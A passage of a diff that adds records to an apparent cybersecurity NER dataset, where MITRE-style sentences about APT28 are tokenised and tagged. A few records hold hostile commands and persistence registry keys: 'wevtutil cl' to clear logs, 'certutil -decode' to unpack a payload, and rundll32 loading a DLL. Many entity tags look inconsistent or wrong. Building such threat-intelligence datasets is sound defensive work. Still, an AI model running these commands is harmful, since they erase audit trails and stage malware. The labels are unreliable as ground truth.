"O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "used", + "a", + "publicly", + "available", + "tool", + "to", + "gather", + "and", + "compress", + "multiple", + "documents", + "on", + "the", + "DCCC", + "and", + "DNC", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "Google", + "Drive", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "deployed", + "a", + "bootkit", + "along", + "with", + "Downdelph", + "to", + "ensure", + "its", + "persistence", + "on", + "the", + "victim.", + "The", + "bootkit", + "shares", + "code", + "with", + "some", + "variants", + "of", + "BlackEnergy." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT28", + "can", + "perform", + "brute", + "force", + "attacks", + "to", + "obtain", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "cleared", + "event", + "logs,", + "including", + "by", + "using", + "the", + "commands", + "<code>wevtutil", + "cl", + "System</code>", + "and", + "<code>wevtutil", + "cl", + "Security</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "compromised", + "Office", + "365", + "service", + "accounts", + "with", + "Global", + "Administrator", + "privileges", + "to", + "collect", + "email", + "from", + "user", + "inboxes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "uses", + "a", + "tool", + "that", + "captures", + "information", + "from", + "air-gapped", + "computers", + "via", + "an", + "infected", + "USB", + "and", + "transfers", + "it", + "to", + "network-connected", + "computer", + "when", + "the", + "USB", + "is", + "inserted." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "COM", + "hijacking", + "for", + "persistence", + "by", + "replacing", + "the", + "legitimate", + "<code>MMDeviceEnumerator</code>", + "object", + "with", + "a", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "harvested", + "user's", + "login", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "split", + "archived", + "exfiltration", + "files", + "into", + "chunks", + "smaller", + "than", + "1MB." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "collected", + "files", + "from", + "various", + "information", + "repositories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "retrieved", + "internal", + "documents", + "from", + "machines", + "inside", + "victim", + "environments,", + "including", + "by", + "using", + "Forfiles", + "to", + "stage", + "documents", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "collected", + "files", + "from", + "network", + "shared", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT28", + "backdoor", + "may", + "collect", + "the", + "entire", + "contents", + "of", + "an", + "inserted", + "USB", + "device." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-SecTeam", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT28", + "macro", + "uses", + "the", + "command", + "<code>certutil", + "-decode</code>", + "to", + "decode", + "contents", + "of", + "a", + ".txt", + "file", + "storing", + "the", + "base64", + "encoded", + "payload." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "registered", + "domains", + "imitating", + "NATO,", + "OSCE", + "security", + "websites,", + "Caucasus", + "information", + "resources,", + "and", + "other", + "organizations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "compromised", + "targets", + "via", + "strategic", + "web", + "compromise", + "utilizing", + "custom", + "exploit", + "kits.", + "APT28", + "used", + "reflected", + "cross-site", + "scripting", + "(XSS)", + "against", + "government", + "websites", + "to", + "redirect", + "users", + "to", + "phishing", + "webpages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "delivered", + "JHUHUGIT", + "and", + "Koadic", + "by", + "executing", + "PowerShell", + "commands", + "through", + "DDE", + "in", + "Word", + "documents." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "compromised", + "email", + "accounts", + "to", + "send", + "credential", + "phishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "encrypted", + "a", + ".dll", + "payload", + "using", + "RTL", + "and", + "a", + "custom", + "encryption", + "algorithm.", + "APT28", + "has", + "also", + "obfuscated", + "payloads", + "with", + "base64,", + "XOR,", + "and", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "exfiltrated", + "archives", + "of", + "collected", + "data", + "previously", + "staged", + "on", + "a", + "target's", + "OWA", + "server", + "via", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT28", + "can", + "exfiltrate", + "data", + "over", + "Google", + "Drive." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "variety", + "of", + "public", + "exploits,", + "including", + "CVE", + "2020-0688", + "and", + "CVE", + "2020-17144,", + "to", + "gain", + "execution", + "on", + "vulnerable", + "Microsoft", + "Exchange;", + "they", + "have", + "also", + "conducted", + "SQL", + "injection", + "attacks", + "against", + "external", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "exploited", + "Microsoft", + "Office", + "vulnerability", + "CVE-2017-0262", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Exp", + "I-Exp", + "I-Exp", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "CVE-2015-4902", + "to", + "bypass", + "security", + "features." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "exploited", + "CVE-2014-4076,", + "CVE-2015-2387,", + "CVE-2015-1701,", + "CVE-2017-0263", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "exploited", + "a", + "Windows", + "SMB", + "Remote", + "Code", + "Execution", + "Vulnerability", + "to", + "conduct", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "I-Exp", + "I-Exp", + "I-Exp", + "I-Exp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "used", + "other", + "victims", + "as", + "proxies", + "to", + "relay", + "command", + "traffic,", + "for", + "instance", + "using", + "a", + "compromised", + "Georgian", + "military", + "email", + "server", + "as", + "a", + "hop", + "point", + "to", + "NATO", + "victims.", + "The", + "group", + "has", + "also", + "used", + "a", + "tool", + "that", + "acts", + "as", + "a", + "proxy", + "to", + "allow", + "C2", + "even", + "if", + "the", + "victim", + "is", + "behind", + "a", + "router.", + "APT28", + "has", + "also", + "used", + "a", + "machine", + "to", + "relay", + "and", + "obscure", + "communications", + "between", + "CHOPSTICK", + "and", + "their", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "Tor", + "and", + "a", + "variety", + "of", + "commercial", + "VPN", + "services", + "to", + "route", + "brute", + "force", + "authentication", + "attempts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "intentionally", + "deleted", + "computer", + "files", + "to", + "cover", + "their", + "tracks,", + "including", + "with", + "use", + "of", + "the", + "program", + "CCleaner." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "Forfiles", + "to", + "locate", + "PDF,", + "Excel,", + "and", + "Word", + "documents", + "during", + "collection.", + "The", + "group", + "also", + "searched", + "a", + "compromised", + "DCCC", + "computer", + "for", + "specific", + "terms." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "saved", + "files", + "with", + "hidden", + "file", + "attributes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "the", + "WindowStyle", + "parameter", + "to", + "conceal", + "PowerShell", + "windows." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "downloaded", + "additional", + "files,", + "including", + "by", + "using", + "a", + "first-stage", + "downloader", + "to", + "contact", + "the", + "C2", + "server", + "to", + "obtain", + "the", + "second-stage", + "implant." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "added", + "\"junk", + "data\"", + "to", + "each", + "encoded", + "string,", + "preventing", + "trivial", + "decoding", + "without", + "knowledge", + "of", + "the", + "junk", + "removal", + "algorithm.", + "Each", + "implant", + "was", + "given", + "a", + "\"junk", + "length\"", + "value", + "when", + "created,", + "tracked", + "by", + "the", + "controller", + "software", + "to", + "allow", + "seamless", + "communication", + "but", + "prevent", + "analysis", + "of", + "the", + "command", + "protocol", + "on", + "the", + "wire." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "tools", + "to", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "regularly", + "deploys", + "both", + "publicly", + "available", + "(ex:", + "Mimikatz)", + "and", + "custom", + "password", + "retrieval", + "tools", + "on", + "victims.", + "They", + "have", + "also", + "dumped", + "the", + "LSASS", + "process", + "memory", + "using", + "the", + "MiniDump", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "stored", + "captured", + "credential", + "information", + "in", + "a", + "file", + "named", + "pi.log." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "An", + "APT28", + "loader", + "Trojan", + "adds", + "the", + "Registry", + "key", + "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "IMAP,", + "POP3,", + "and", + "SMTP", + "for", + "a", + "communication", + "channel", + "in", + "various", + "implants,", + "including", + "using", + "self-registered", + "Google", + "Mail", + "accounts", + "and", + "later", + "compromised", + "email", + "servers", + "of", + "its", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "attempted", + "to", + "get", + "users", + "to", + "click", + "on", + "Microsoft", + "Office", + "attachments", + "containing", + "malicious", + "macro", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "tricked", + "unwitting", + "recipients", + "into", + "clicking", + "on", + "malicious", + "hyperlinks", + "within", + "emails", + "crafted", + "to", + "resemble", + "trustworthy", + "senders." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "renamed", + "the", + "WinRAR", + "utility", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "changed", + "extensions", + "on", + "files", + "containing", + "exfiltrated", + "data", + "to", + "make", + "them", + "appear", + "benign,", + "and", + "renamed", + "a", + "web", + "shell", + "instance", + "to", + "appear", + "as", + "a", + "legitimate", + "OWA", + "page." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "routed", + "traffic", + "over", + "Tor", + "and", + "VPN", + "servers", + "to", + "obfuscate", + "their", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "the", + "ntdsutil.exe", + "utility", + "to", + "export", + "the", + "Active", + "Directory", + "database", + "for", + "credential", + "access." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "2016,", + "APT28", + "conducted", + "a", + "distributed", + "denial", + "of", + "service", + "(DDoS)", + "attack", + "against", + "the", + "World", + "Anti-Doping", + "Agency." + ], + "ner_tags": [ + "O", + "B-Time", + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "compromised", + "Ubiquiti", + "network", + "devices", + "to", + "act", + "as", + "collection", + "devices", + "for", + "credentials", + "compromised", + "via", + "phishing", + "webpages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "deployed", + "the", + "open", + "source", + "tool", + "Responder", + "to", + "conduct", + "NetBIOS", + "Name", + "Service", + "poisoning,", + "which", + "captured", + "usernames", + "and", + "hashed", + "passwords", + "that", + "allowed", + "access", + "to", + "legitimate", + "credentials.", + "APT28", + "close-access", + "teams", + "have", + "used", + "Wi-Fi", + "pineapples", + "to", + "intercept", + "Wi-Fi", + "signals", + "and", + "user", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "regularly", + "deploys", + "both", + "publicly", + "available", + "(ex:", + "Mimikatz)", + "and", + "custom", + "password", + "retrieval", + "tools", + "on", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "the", + "Office", + "Test", + "persistence", + "mechanism", + "within", + "Microsoft", + "Office", + "by", + "adding", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Office", + "test\\Special\\Perf</code>", + "to", + "execute", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "pass", + "the", + "hash", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "brute-force/password-spray", + "tooling", + "that", + "operated", + "in", + "two", + "modes:", + "in", + "brute-force", + "mode", + "it", + "typically", + "sent", + "over", + "300", + "authentication", + "attempts", + "per", + "hour", + "per", + "targeted", + "account", + "over", + "the", + "course", + "of", + "several", + "hours", + "or", + "days.", + "APT28", + "has", + "also", + "used", + "a", + "Kubernetes", + "cluster", + "to", + "conduct", + "distributed,", + "large-scale", + "password", + "guessing", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "B-OffAct" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "brute-force/password-spray", + "tooling", + "that", + "operated", + "in", + "two", + "modes:", + "in", + "password-spraying", + "mode", + "it", + "conducted", + "approximately", + "four", + "authentication", + "attempts", + "per", + "hour", + "per", + "targeted", + "account", + "over", + "the", + "course", + "of", + "several", + "days", + "or", + "weeks.", + "APT28", + "has", + "also", + "used", + "a", + "Kubernetes", + "cluster", + "to", + "conduct", + "distributed,", + "large-scale", + "password", + "spray", + "attacks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "B-OffAct" + ] + }, + { + "tokens": [ + "APT28", + "uses", + "a", + "module", + "to", + "receive", + "a", + "notification", + "every", + "time", + "a", + "USB", + "mass", + "storage", + "device", + "is", + "inserted", + "into", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "spearphishing", + "to", + "compromise", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "downloads", + "and", + "executes", + "PowerShell", + "scripts", + "and", + "performs", + "PowerShell", + "commands." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT28", + "loader", + "Trojan", + "will", + "enumerate", + "the", + "victim's", + "processes", + "searching", + "for", + "explorer.exe", + "if", + "its", + "current", + "process", + "does", + "not", + "have", + "necessary", + "permissions." + ], + "ner_tags": [ + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "deployed", + "malware", + "that", + "has", + "copied", + "itself", + "to", + "the", + "startup", + "directory", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "staged", + "archives", + "of", + "collected", + "data", + "on", + "a", + "target's", + "Outlook", + "Web", + "Access", + "(OWA)", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "collected", + "emails", + "from", + "victim", + "Microsoft", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "uses", + "a", + "tool", + "to", + "infect", + "connected", + "USB", + "devices", + "and", + "transmit", + "itself", + "to", + "air-gapped", + "computers", + "when", + "the", + "infected", + "USB", + "device", + "is", + "inserted." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "a", + "UEFI", + "(Unified", + "Extensible", + "Firmware", + "Interface)", + "rootkit", + "known", + "as", + "LoJax." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT28", + "executed", + "CHOPSTICK", + "by", + "using", + "rundll32", + "commands", + "such", + "as", + "<code>rundll32.exe", + "“C:\\Windows\\twain_64.dll”</code>.", + "APT28", + "also", + "executed", + "a", + ".dll", + "for", + "a", + "first", + "stage", + "dropper", + "using", + "rundll32.exe.", + "An", + "APT28", + "loader", + "Trojan", + "saved", + "a", + "batch", + "script", + "that", + "uses", + "rundll32", + "to", + "execute", + "a", + "DLL", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "mapped", + "network", + "drives", + "using", + "Net", + "and", + "administrator", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "tools", + "to", + "take", + "screenshots", + "from", + "victims." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "collected", + "information", + "from", + "Microsoft", + "SharePoint", + "services", + "within", + "target", + "networks." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "Microsoft", + "Office", + "and", + "RAR", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT28", + "sent", + "spearphishing", + "emails", + "which", + "used", + "a", + "URL-shortener", + "service", + "to", + "masquerade", + "as", + "a", + "legitimate", + "service", + "and", + "to", + "redirect", + "targets", + "to", + "credential", + "harvesting", + "sites." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Purp", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "conducted", + "credential", + "phishing", + "campaigns", + "with", + "embedded", + "links", + "to", + "attacker-controlled", + "domains." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT28", + "has", + "used", + "several", + "malicious", + "applications", + "to", + "steal", + "user", + "OAuth", + "access", + "tokens", + "including", + "applications", + "masquerading", + "as", + "\"Google", + "Defender\"", + "\"Google", + "Email", + "Protection,\"", + "and", + "\"Google", + "Scanner\"", + "for", + "Gmail", + "users.", + "They", + "also", + "targeted", + "Yahoo", + "users", + "with", + "applications", + "masquerading", + "as", + "\"Delivery", + "Service\"", + "and", + "\"McAfee", + "Email", + "Protection\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SecTeam", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-SecTeam", + "O" + ] + }, + { + "tokens": [ + "APT28", + "installed", + "a", + "Delphi", + "backdoor", + "that", + "used", + 